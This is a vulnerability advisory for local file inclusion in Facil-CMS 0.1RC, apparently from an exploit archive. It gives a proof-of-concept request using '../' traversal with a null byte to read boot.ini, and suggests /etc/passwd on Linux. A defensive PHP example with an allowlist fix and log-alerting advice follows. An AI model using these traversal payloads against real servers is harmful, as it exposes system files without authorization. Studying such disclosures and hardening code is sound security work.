Facil-CMS 0.1RC Multiple Local File Inclusion Vulnerabilities

2009-09-08 / 2009-09-09
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=======================================================
 Facil-CMS 0.1RC Local File Inclusion Vulnerabilities
=======================================================

    ,--^----------,--------,-----,-------^--,
    |    |||||||||   `--------'     |        O .. CWH Underground Hacking Team ..
    `+---------------------------^----------|
      `\_,-------, _________________________|
        / XXXXXX /`|     /
       / XXXXXX /  `\   /
      / XXXXXX /\______(
     / XXXXXX /
    / XXXXXX /
   (________(
    `------'

AUTHOR : CWH Underground
DATE   : 12 June 2008
SITE   : www.citec.us

#####################################################
 APPLICATION : Facil-CMS
 VERSION     : 0.1RC
 VENDOR      : http://facilcms.org/
 DOWNLOAD    : http://downloads.sourceforge.net/facil-cms
#####################################################

+++ Local File Inclusion Exploit +++

-------------
 Description
-------------

[+] Use a web proxy (WebScarab, Burp Proxy, etc.) to intercept the GET request and edit the request data.

-----------------------------------------------------
 LFI Exploits
-----------------------------------------------------

[+] http://[Target]/[Path]/index.php?change_lang=<LFI>
[+] http://[Target]/[Path]/modules.php?modload=<LFI>

------------------------------------------
 POC (Use WebScarab to edit request data)
------------------------------------------

[+] GET http://192.168.23.13/facil/index.php?change_lang=../../../../../../../../boot.ini%00 HTTP/1.1
[+] Accept: */*
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.23.13
[+] Cookie: PHPSESSID=e0751800f8e3dca481f3a7369d4a6232

This exploit will open boot.ini from the system drive:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

You can change boot.ini to /etc/passwd%00 on a Linux OS.

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
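The bug class behind both parameters is an include path built directly from request input. The following PHP is an added example, not Facil-CMS source (the `lang/` and modules directory layout, the function names and the allowlist are assumptions). It places the vulnerable pattern beside a hardened loader that resolves `change_lang` through a fixed allowlist and validates `modload` as a strict identifier whose resolved path must stay inside the modules directory. The null byte matters because PHP before 5.3.4 truncated include paths at `\0`, which is what let the `%00` suffix discard the appended `.php`.

```php
<?php
declare(strict_types=1);

// Added example (not Facil-CMS code): directory layout and function names are assumed.

// Hypothetical vulnerable pattern: the request value is spliced into the include path.
// "../../../../boot.ini%00" walks out of lang/, and on PHP < 5.3.4 the null byte
// truncates the string so the ".php" suffix never reaches the filesystem.
function vulnerable_lang_path(string $userValue): string
{
    return __DIR__ . '/lang/' . $userValue . '.php';
}

// Hardened change_lang: map the request value onto a fixed allowlist.
// Traversal sequences and null bytes never match a key, so they fall back to the default.
const ALLOWED_LANGS = ['en' => 'english', 'fr' => 'french', 'es' => 'spanish'];

function safe_lang_path(string $userValue): string
{
    $key = ALLOWED_LANGS[$userValue] ?? ALLOWED_LANGS['en'];
    return __DIR__ . '/lang/' . $key . '.php';
}

// Hardened modload: accept only a short identifier charset, then confirm (defence in
// depth) that the resolved file is still inside the modules directory.
function safe_module_path(string $baseDir, string $userValue): ?string
{
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $userValue)) {
        return null;                       // rejects "../", "\0", URLs, absolute paths
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . '/' . $userValue . '.php');
    if ($candidate === false) {
        return null;                       // no such module
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // symlink or other escape from the base directory
    }
    return $candidate;
}

// Constructed inputs shaped like the advisory's payload (not captured traffic).
$probe = "../../../../boot.ini\0";
printf("vulnerable: %s\n", str_replace("\0", '%00', vulnerable_lang_path($probe)));
printf("hardened  : %s\n", safe_lang_path($probe));
var_dump(safe_module_path(__DIR__, '../../../../etc/passwd'));   // NULL: fails the charset check
var_dump(safe_module_path(__DIR__, 'news') !== null);            // true only if news.php exists beside this script
```

The allowlist is the real fix; the `realpath` containment check exists so that a later refactor which reintroduces user-derived path segments still cannot read outside the intended directory. Requests whose `change_lang` or `modload` value contains `../` or `%00` are also a cheap, high-signal pattern to alert on in web server logs.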

References:

http://xforce.iss.net/xforce/xfdb/43037
http://www.securityfocus.com/bid/29692
http://www.milw0rm.com/exploits/5792

